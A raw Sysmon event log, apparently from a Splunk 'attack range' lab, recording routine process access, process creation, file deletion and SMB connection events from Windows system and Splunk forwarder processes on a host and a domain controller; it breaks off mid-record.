10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0F6B-6216-1B04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.878{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F6B-6216-1B04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.879{4F8D34B0-0F6B-6216-1B04-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F6B-6216-1A04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0F6B-6216-1A04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.362{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F6B-6216-1A04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.363{4F8D34B0-0F6B-6216-1A04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:47.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CDFCB25FA4474A900E3C8A31D416B67,SHA256=BBA26B039F0A716AC867D99A90300FDB6AF033F65787BFD21ED3413166EA4A75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:48.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B465BF5966D3A49AC19DDA2C2923277,SHA256=8E4758022214B25D5F7831893135B81BCEC3D7CFF89A03755EC7EA8C7FDF6743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:48.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FA74F03A9D1AA7D51011AC7229FF56F,SHA256=C9D31FF7DB563900B9B002E0F5595BD764005E550A8CAF9F4BE8E7EB4DCD09E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:48.489{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC568AD05BA0E349CA8D161EF4B43262,SHA256=640E42136F9536F393A176F29ED30CEFEEFC5EA9550E02D0590217D6487384CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:48.380{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:48.304{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000286086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:48.208{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:48.192{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:48.065{4F8D34B0-0F6B-6216-1B04-000000003902}1036776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.785{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53301-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000286101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:47.784{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53301-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000286100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:49.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 